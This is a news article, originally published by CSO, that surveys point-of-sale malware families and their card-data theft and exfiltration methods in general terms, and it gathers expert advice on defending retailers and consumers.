A wide range of choices for consumers is one of the things that make the American economy vibrant.

Unfortunately, a wide range of choices also exists in the world of cybercrime, where developers of malware focused on point-of-sale (POS) systems have created dozens of ways to steal payment card information from those same consumers.

Thanks to the catastrophic breach of retailer Target at this time last year, it is now widely known that the current – although now outgoing – payment card system is easily exploitable.

For a millisecond or so after a card with a magnetic stripe is swiped at a POS terminal, the information is unencrypted. In that millisecond, POS malware is able to copy it, and the criminals then collect it.

The U.S. is moving to payment systems with better security. By October 2015, the 1960s-vintage “swipe-and-signature” card system is expected to be mostly replaced either by a smart-card system called EMV or Chip-and-PIN, or to an even newer system using so-called near-field-communication (NFC) technology favored by tech giants like Apple and Google.

But that still leaves plenty of time, including the current holiday season (when POS terminals get their biggest workout of the year), for thieves to raid retailers and other credit card processors.

The problem for the defenders of credit card systems is not just the variety of POS malware families, but that they can evolve so quickly. Kevin McAleavey, a malware expert and cofounder of the KNOS Project, said most security technology still depends in large measure on identifying “signatures” of malicious software.

But antivirus software’s recognition of new signatures generally, “trails by hours, days and even longer each new variant of malware,” he said.

“This is one of the major reasons why a command and control network is part of commercial malware. It gives the controllers the ability to update and replace their malware as soon as it is detected by antivirus software, with improved, and once again undetectable, replacements,” he said.

McAleavey said “intrusion detection” systems provide some added benefit, but they also depend on matching the signatures of known malware at the perimeter of an organization’s network.

“Given that POS malware in particular is a well-funded criminal enterprise, the bad guys have the ability to keep ahead of those detection signatures as well,” he said.

POS malware families

Security vendor Trustwave compiled a list of 10 popular POS malware families that the firm says retailers “should keep on their radar,” but other experts including McAleavey recommend others to add to the list.

The Trustwave list includes:

Backoff – Since its discovery a little more than a year ago, there have been more than 12 variants discovered in the wild. The newest versions send back the stolen data using SSL, the same protocol that protects consumers’ information when they are shopping online. This gives criminals a chance to hide the transmission from security products.

FrameworkPOS – There have been at least six variants of this family during the past couple of years. One clever version co-opts DNS, the protocol used to translate domain names into IP addresses, to send back the stolen payment card data and IP address of the victim.

BlackPOS – Also known as “Kaptoxa,” it has a component that allows it to copy payment cards it has collected to another computer via local network shares where they are consolidated before being sent out of the victim’s network.

JackPOS – This had a number of internal programming bugs that somewhat limited its ultimate effectiveness. It exfiltrates payment card data by sending it to attackers over HTTP with what is known as a POST request – a basic way to send data to a web server.

Chewbacca – Also known as Fysna, it is not nearly as widespread as some other POS malware families, but does have a unique capability. It uses the Tor anonymity network to hide its communications.

vSkimmer – Thought by some to be a descendant of the Dexter malware family, this is an early example of POS malware that operates as a botnet. In addition to stealing payment card information, it can receive commands from a server controlled by the attackers.

Dexter – The most recent of three major variants uploaded its payment cards to an FTP server. This is an uncommon technique for malware attacks, since the username and password to access the server is often included in the malware itself and allows investigators to track the criminals.

Alina – More than 13 variants were discovered in the wild this past year. Each new release of the malware includes incremental improvements and tweaks to the code helping the attackers block detection by security defenses.

ProjectHook – Discovered in 2012, but references to its code base are still being used in new malware families. It has a unique ability to update the list of command-and-control servers with which it communicates.

AutoIT Based –The least technically advanced example. It leverages AutoIT, a legitimate IT administration scripting language, and uses the simplified programming code to gather the payment cards instead of using a compiled lower-level language that requires a more formalized understanding of programming.

***

Other experts have offered several additions to that list.

Getymypass – PC World reported last month that Nick Hoffman, a reverse engineer, said Getmypass is like other RAM scrapers, “which collect unencrypted payment card data held in a payment system’s memory.” He said it is still in development, but evaded 55 antivirus scanners on VirusTotal. McAleavey said he was able to track the author through certificate registration to an apartment block in Moscow. Shortly after that, he said, the author moved everything to the Tor “onion” network.

D4re|dev1| – Discovered by threat intelligence firm IntelCrawler, this strain (pronounced “daredevil”) is aimed at ticket vending machines and electronic kiosks. It uses RAM scraping and keylogging features like other POS malware.

@-Brt – This strain, announced by IntelCrawler in July, is an automated network that uses, “an underground bot army” of infected computers to, “brute force POS systems in an attempt to steal login credentials.”

Even though today’s obsolete payment card system is still in place, experts say there are steps that organizations and individuals can take to make themselves a more difficult target.

Karl Sigler, threat intelligence manager at Trustwave, noted that, “in many of the POS malware attacks this past year, the criminals got in due to weak security practices by third-party providers.”

That, as is widely know, is how the Target breach occurred. And third-party security is expected to improve, since the latest Payment Card Industry Data Security Standard – PCI- DSS 3.0 – includes more stringent requirements for third-party providers starting Jan. 1.

“However, businesses should do more,” Sigler said. “Their contracts with third-party providers should include clauses regarding data protection. They should also have their own layered security strategy in place so even if a criminal compromises a third-party provider’s password, he can still be stopped from gaining access to the business’s entire infrastructure.”

Other recommendations for organizations include:

“Allow only whitelisted applications on POS devices,” said Timo Hirvonen, senior researcher, Security Response, at F-Secure. “There should be a default-deny policy for all connections to and from the POS device.”

McAleavey recommends joining with other organizations in, “indicators of compromise" sharing solutions, “as proposed by the OpenIOC Framework created by Mandiant” – a security firm acquired a year ago by FireEye.

“Network and host-based monitoring for indicators of compromise, data exfiltration and malware communication plays a critical role,” said Mario de Boer, research director, Security and Risk Management Strategies at Gartner for Technical Professionals.

Use a POS system is only for that purpose, not as a workspace computer. “Organizations should segment their critical data – customers’ payment card data – from their non-critical data,” Sigler said.

Organize cyber intelligence and threat monitoring frameworks across the enterprise. “Traditionally these infrastructures are franchised-based and decentralized,” said Andrew Komarov, CEO of IntelCrawler. “That creates serious flaws in security.”

Have skilled security staff in place. “Security technologies such as intrusion detection and prevention, network access control, anti-malware technologies and others, are only as good as the people who manage them,” Sigler said.

Experts also caution that while the transfer of the PCI system to EMV or NFC will improve security significantly, it will not eliminate credit card fraud.

EMV, while it improves security at the POS terminal, it still leaves the user vulnerable for “card-not-present” transactions such as online purchases.

NFC holds the possibility of being even more secure. With ApplePay, the merchant never sees the credit card number, and the data is encrypted from the phone to the participating bank.

Still, as Paganini notes, “Any new technology has new risks. Security professionals have identified vulnerabilities and bugs in various versions of NFC technology, as well as ApplePay as a product.”

According to McAleavey, the best thing individual consumers can do is to sign up for two-factor authentication. “It won't prevent their credit card numbers from getting lifted by malware,” he said, “but with two-factor, where a secret code is transmitted to your phone or a special key fob to confirm the sale, that's a one-time use code. Once you've confirmed at the POS that it really is you, the approval goes through. If someone else tries to use the card, then they cannot provide the countersignature.”

This story, "Top malware families turn point-of-sale into point-of-theft" was originally published by
CSO.